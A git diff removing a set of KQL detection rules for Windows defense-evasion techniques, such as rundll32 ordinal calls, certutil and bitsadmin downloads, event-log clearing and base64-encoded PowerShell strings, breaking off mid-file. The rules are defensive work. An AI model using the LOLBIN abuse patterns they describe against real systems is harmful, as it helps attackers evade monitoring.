diff --git a/Defense Evasion/Suspicious_Advpack_Call_Via_Rundll32.EXE.kql b/Defense Evasion/Suspicious_Advpack_Call_Via_Rundll32.EXE.kql
deleted file mode 100644
index dc599be6..00000000
--- a/Defense Evasion/Suspicious_Advpack_Call_Via_Rundll32.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/17
-// Level: high
-// Description: Detects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "advpack" and ((ProcessCommandLine contains "#+" and ProcessCommandLine contains "12") or ProcessCommandLine contains "#-") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_AgentExecutor_PowerShell_Execution.kql b/Defense Evasion/Suspicious_AgentExecutor_PowerShell_Execution.kql
deleted file mode 100644
index 48c1c2d1..00000000
--- a/Defense Evasion/Suspicious_AgentExecutor_PowerShell_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), memory-shards
-// Date: 2022/12/24
-// Level: high
-// Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -powershell" or ProcessCommandLine contains " -remediationScript") and (FolderPath endswith "\\AgentExecutor.exe" or ProcessVersionInfoOriginalFileName =~ "AgentExecutor.exe")) and (not((ProcessCommandLine contains "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\" or ProcessCommandLine contains "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Application_Allowed_Through_Exploit_Guard.kql b/Defense Evasion/Suspicious_Application_Allowed_Through_Exploit_Guard.kql
deleted file mode 100644
index 1407fd7f..00000000
--- a/Defense Evasion/Suspicious_Application_Allowed_Through_Exploit_Guard.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/05
-// Level: high
-// Description: Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryKey contains "SOFTWARE\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\AllowedApplications" and (RegistryKey contains "\\Users\\Public" or RegistryKey contains "\\AppData\\Local\\Temp" or RegistryKey contains "\\Desktop" or RegistryKey contains "\\PerfLogs" or RegistryKey contains "\\Windows\\Temp")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Cabinet_File_Execution_Via_Msdt.EXE.kql b/Defense Evasion/Suspicious_Cabinet_File_Execution_Via_Msdt.EXE.kql
deleted file mode 100644
index 55cd2a6a..00000000
--- a/Defense Evasion/Suspicious_Cabinet_File_Execution_Via_Msdt.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113
-// Date: 2022/06/21
-// Level: medium
-// Description: Detects execution of msdt.exe using the "cab" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -cab " or ProcessCommandLine contains " /cab ") and (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Calculator_Usage.kql b/Defense Evasion/Suspicious_Calculator_Usage.kql
deleted file mode 100644
index 70fa9441..00000000
--- a/Defense Evasion/Suspicious_Calculator_Usage.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/02/09
-// Level: high
-// Description: Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.
-
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\calc.exe " or (FolderPath endswith "\\calc.exe" and (not((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Call_by_Ordinal.kql b/Defense Evasion/Suspicious_Call_by_Ordinal.kql
deleted file mode 100644
index 951412c5..00000000
--- a/Defense Evasion/Suspicious_Call_by_Ordinal.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/10/22
-// Level: high
-// Description: Detects suspicious calls of DLLs in rundll32.dll exports by ordinal
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where ((ProcessCommandLine contains ",#" or ProcessCommandLine contains ", #" or ProcessCommandLine contains ".dll #" or ProcessCommandLine contains ".ocx #") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")) and (not(((ProcessCommandLine contains "EDGEHTML.dll" and ProcessCommandLine contains "#141") or ((ProcessCommandLine contains "\\FileTracker32.dll,#1" or ProcessCommandLine contains "\\FileTracker32.dll\",#1" or ProcessCommandLine contains "\\FileTracker64.dll,#1" or ProcessCommandLine contains "\\FileTracker64.dll\",#1") and (InitiatingProcessFolderPath contains "\\Msbuild\\Current\\Bin\\" or InitiatingProcessFolderPath contains "\\VC\\Tools\\MSVC\\" or InitiatingProcessFolderPath contains "\\Tracker.exe")))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Child_Process_Of_BgInfo.EXE.kql b/Defense Evasion/Suspicious_Child_Process_Of_BgInfo.EXE.kql
deleted file mode 100644
index d6006a54..00000000
--- a/Defense Evasion/Suspicious_Child_Process_Of_BgInfo.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/16
-// Level: high
-// Description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
-// Tags: attack.execution, attack.t1059.005, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\Roaming\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\PerfLogs\\")) and (InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Child_Process_Of_Wermgr.EXE.kql b/Defense Evasion/Suspicious_Child_Process_Of_Wermgr.EXE.kql
deleted file mode 100644
index b25dfd18..00000000
--- a/Defense Evasion/Suspicious_Child_Process_Of_Wermgr.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/10/14
-// Level: high
-// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055, attack.t1036
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\wermgr.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Child_Process_of_AspNetCompiler.kql b/Defense Evasion/Suspicious_Child_Process_of_AspNetCompiler.kql
deleted file mode 100644
index 473e7753..00000000
--- a/Defense Evasion/Suspicious_Child_Process_of_AspNetCompiler.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/14
-// Level: high
-// Description: Detects potentially suspicious child processes of "aspnet_compiler.exe".
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\notepad.exe") or (FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\AppData\\Local\\Roaming\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\")) and InitiatingProcessFolderPath endswith "\\aspnet_compiler.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_CodePage_Switch_Via_CHCP.kql b/Defense Evasion/Suspicious_CodePage_Switch_Via_CHCP.kql
deleted file mode 100644
index 595debb6..00000000
--- a/Defense Evasion/Suspicious_CodePage_Switch_Via_CHCP.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
-// Date: 2019/10/14
-// Level: medium
-// Description: Detects a code page switch in command line or batch scripts to a rare language
-// Tags: attack.t1036, attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine endswith " 936" or ProcessCommandLine endswith " 1258") and FolderPath endswith "\\chcp.com"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Control_Panel_DLL_Load.kql b/Defense Evasion/Suspicious_Control_Panel_DLL_Load.kql
deleted file mode 100644
index 02f15c71..00000000
--- a/Defense Evasion/Suspicious_Control_Panel_DLL_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/04/15
-// Level: high
-// Description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\System32\\control.exe") and (not(ProcessCommandLine contains "Shell32.dll"))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Copy_From_or_To_System_Directory.kql b/Defense Evasion/Suspicious_Copy_From_or_To_System_Directory.kql
deleted file mode 100644
index e11f3a48..00000000
--- a/Defense Evasion/Suspicious_Copy_From_or_To_System_Directory.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/07/03
-// Level: medium
-// Description: Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk.
-Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.
-
-// Tags: attack.defense_evasion, attack.t1036.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and (ProcessCommandLine contains "\\System32" or ProcessCommandLine contains "\\SysWOW64" or ProcessCommandLine contains "\\WinSxS")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Creation_with_Colorcpl.kql b/Defense Evasion/Suspicious_Creation_with_Colorcpl.kql
deleted file mode 100644
index a0619d77..00000000
--- a/Defense Evasion/Suspicious_Creation_with_Colorcpl.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/21
-// Level: high
-// Description: Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\
-// Tags: attack.defense_evasion, attack.t1564
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\colorcpl.exe" and (not((FolderPath endswith ".icm" or FolderPath endswith ".gmmp" or FolderPath endswith ".cdmp" or FolderPath endswith ".camp")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Csi.exe_Usage.kql b/Defense Evasion/Suspicious_Csi.exe_Usage.kql
deleted file mode 100644
index ea5c49ee..00000000
--- a/Defense Evasion/Suspicious_Csi.exe_Usage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Konstantin Grishchenko, oscd.community
-// Date: 2020/10/17
-// Level: medium
-// Description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'
-// Tags: attack.execution, attack.t1072, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessVersionInfoCompanyName =~ "Microsoft Corporation" and ((FolderPath endswith "\\csi.exe" or FolderPath endswith "\\rcsi.exe") or (ProcessVersionInfoOriginalFileName in~ ("csi.exe", "rcsi.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_CustomShellHost_Execution.kql b/Defense Evasion/Suspicious_CustomShellHost_Execution.kql
deleted file mode 100644
index b82c76dd..00000000
--- a/Defense Evasion/Suspicious_CustomShellHost_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects the execution of CustomShellHost binary where the child isn't located in 'C:\Windows\explorer.exe'
-// Tags: attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\CustomShellHost.exe" and (not(FolderPath =~ "C:\\Windows\\explorer.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_DLL_Loaded_via_CertOC.EXE.kql b/Defense Evasion/Suspicious_DLL_Loaded_via_CertOC.EXE.kql
deleted file mode 100644
index 6a1909b6..00000000
--- a/Defense Evasion/Suspicious_DLL_Loaded_via_CertOC.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/15
-// Level: high
-// Description: Detects when a user installs certificates by using CertOC.exe to load the target DLL file.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -LoadDLL " or ProcessCommandLine contains " /LoadDLL ") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe") and (ProcessCommandLine contains "\\Appdata\\Local\\Temp\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "C:\\Windows\\Tasks\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Diantz_Alternate_Data_Stream_Execution.kql b/Defense Evasion/Suspicious_Diantz_Alternate_Data_Stream_Execution.kql
deleted file mode 100644
index 69f6a7aa..00000000
--- a/Defense Evasion/Suspicious_Diantz_Alternate_Data_Stream_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/11/26
-// Level: medium
-// Description: Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "diantz.exe" and ProcessCommandLine contains ".cab") and ProcessCommandLine matches regex ":[^\\\\]"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Double_Extension_Files.kql b/Defense Evasion/Suspicious_Double_Extension_Files.kql
deleted file mode 100644
index 0ef9f5c1..00000000
--- a/Defense Evasion/Suspicious_Double_Extension_Files.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2022/06/19
-// Level: high
-// Description: Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default.
-// Tags: attack.defense_evasion, attack.t1036.007
-DeviceFileEvents
-| where (FolderPath endswith ".rar.exe" or FolderPath endswith ".zip.exe") or ((FolderPath contains ".doc." or FolderPath contains ".docx." or FolderPath contains ".jpg." or FolderPath contains ".pdf." or FolderPath contains ".ppt." or FolderPath contains ".pptx." or FolderPath contains ".xls." or FolderPath contains ".xlsx.") and (FolderPath endswith ".exe" or FolderPath endswith ".iso" or FolderPath endswith ".rar" or FolderPath endswith ".zip"))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql b/Defense Evasion/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql
deleted file mode 100644
index 194705f0..00000000
--- a/Defense Evasion/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects usage of bitsadmin downloading a file using an URL that contains an IP
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")) and (not(ProcessCommandLine contains "://7-"))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql b/Defense Evasion/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql
deleted file mode 100644
index b4aa432b..00000000
--- a/Defense Evasion/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects usage of bitsadmin downloading a file from a suspicious domain
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "cdn.discordapp.com/attachments/" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "ufile.io") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Download_Via_Certutil.EXE.kql b/Defense Evasion/Suspicious_Download_Via_Certutil.EXE.kql
deleted file mode 100644
index 9ce127d5..00000000
--- a/Defense Evasion/Suspicious_Download_Via_Certutil.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/15
-// Level: medium
-// Description: Detects the execution of certutil with certain flags that allow the utility to download files.
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and ProcessCommandLine contains "http" and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_DumpMinitool_Execution.kql b/Defense Evasion/Suspicious_DumpMinitool_Execution.kql
deleted file mode 100644
index d77e0e31..00000000
--- a/Defense Evasion/Suspicious_DumpMinitool_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/04/06
-// Level: high
-// Description: Detects suspicious ways to use the "DumpMinitool.exe" binary
-// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001
-DeviceProcessEvents
-| where ((FolderPath endswith "\\DumpMinitool.exe" or FolderPath endswith "\\DumpMinitool.x86.exe" or FolderPath endswith "\\DumpMinitool.arm64.exe") or (ProcessVersionInfoOriginalFileName in~ ("DumpMinitool.exe", "DumpMinitool.x86.exe", "DumpMinitool.arm64.exe"))) and ((not((FolderPath contains "\\Microsoft Visual Studio\\" or FolderPath contains "\\Extensions\\"))) or ProcessCommandLine contains ".txt" or ((ProcessCommandLine contains " Full" or ProcessCommandLine contains " Mini" or ProcessCommandLine contains " WithHeap") and (not(ProcessCommandLine contains "--dumpType"))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql b/Defense Evasion/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql
deleted file mode 100644
index c8bc79a5..00000000
--- a/Defense Evasion/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2022/03/01
-// Level: high
-// Description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly"
-// Tags: attack.execution, attack.defense_evasion, attack.t1059.001, attack.t1027
-DeviceProcessEvents
-| where ProcessCommandLine contains "OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvACIAKwAiAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvAGEAIgArACIAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvACcAKwAnAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvAGEAJwArACcAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Environment_Variable_Has_Been_Registered.kql b/Defense Evasion/Suspicious_Environment_Variable_Has_Been_Registered.kql
deleted file mode 100644
index 700cfc45..00000000
--- a/Defense Evasion/Suspicious_Environment_Variable_Has_Been_Registered.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/20
-// Level: high
-// Description: Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings
-// Tags: attack.defense_evasion, attack.persistence
-DeviceRegistryEvents
-| where ((RegistryValueData in~ ("powershell", "pwsh")) or (RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "C:\\Users\\Public\\" or RegistryValueData contains "TVqQAAMAAAAEAAAA" or RegistryValueData contains "TVpQAAIAAAAEAA8A" or RegistryValueData contains "TVqAAAEAAAAEABAA" or RegistryValueData contains "TVoAAAAAAAAAAAAA" or RegistryValueData contains "TVpTAQEAAAAEAAAA" or RegistryValueData contains "SW52b2tlL" or RegistryValueData contains "ludm9rZS" or RegistryValueData contains "JbnZva2Ut" or RegistryValueData contains "SQBuAHYAbwBrAGUALQ" or RegistryValueData contains "kAbgB2AG8AawBlAC0A" or RegistryValueData contains "JAG4AdgBvAGsAZQAtA") or (RegistryValueData startswith "SUVY" or RegistryValueData startswith "SQBFAF" or RegistryValueData startswith "SQBuAH" or RegistryValueData startswith "cwBhA" or RegistryValueData startswith "aWV4" or RegistryValueData startswith "aQBlA" or RegistryValueData startswith "R2V0" or RegistryValueData startswith "dmFy" or RegistryValueData startswith "dgBhA" or RegistryValueData startswith "dXNpbm" or RegistryValueData startswith "H4sIA" or RegistryValueData startswith "Y21k" or RegistryValueData startswith "cABhAH" or RegistryValueData startswith "Qzpc" or RegistryValueData startswith "Yzpc")) and RegistryKey contains "\\Environment"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Eventlog_Clear_or_Configuration_Change.kql b/Defense Evasion/Suspicious_Eventlog_Clear_or_Configuration_Change.kql
deleted file mode 100644
index b126c478..00000000
--- a/Defense Evasion/Suspicious_Eventlog_Clear_or_Configuration_Change.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105
-// Date: 2019/09/26
-// Level: high
-// Description: Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).
-// Tags: attack.defense_evasion, attack.t1070.001, attack.t1562.002, car.2016-04-002
-DeviceProcessEvents
-| where (((ProcessCommandLine contains "Clear-EventLog " or ProcessCommandLine contains "Remove-EventLog " or ProcessCommandLine contains "Limit-EventLog " or ProcessCommandLine contains "Clear-WinEvent ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains "ClearEventLog" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe")) or ((ProcessCommandLine contains "clear-log " or ProcessCommandLine contains " cl " or ProcessCommandLine contains "set-log " or ProcessCommandLine contains " sl " or ProcessCommandLine contains "lfn:") and FolderPath endswith "\\wevtutil.exe")) and (not((ProcessCommandLine contains " sl " and (InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\msiexec.exe", "C:\\Windows\\System32\\msiexec.exe")))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Executable_File_Creation.kql b/Defense Evasion/Suspicious_Executable_File_Creation.kql
deleted file mode 100644
index e8188447..00000000
--- a/Defense Evasion/Suspicious_Executable_File_Creation.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/09/05
-// Level: high
-// Description: Detect creation of suspicious executable file names.
-Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.
-
-// Tags: attack.defense_evasion, attack.t1564
-DeviceFileEvents
-| where FolderPath endswith ":\\$Recycle.Bin.exe" or FolderPath endswith ":\\Documents and Settings.exe" or FolderPath endswith ":\\MSOCache.exe" or FolderPath endswith ":\\PerfLogs.exe" or FolderPath endswith ":\\Recovery.exe" or FolderPath endswith ".bat.exe" or FolderPath endswith ".sys.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Execution_From_GUID_Like_Folder_Names.kql b/Defense Evasion/Suspicious_Execution_From_GUID_Like_Folder_Names.kql
deleted file mode 100644
index 95f75b3a..00000000
--- a/Defense Evasion/Suspicious_Execution_From_GUID_Like_Folder_Names.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/01
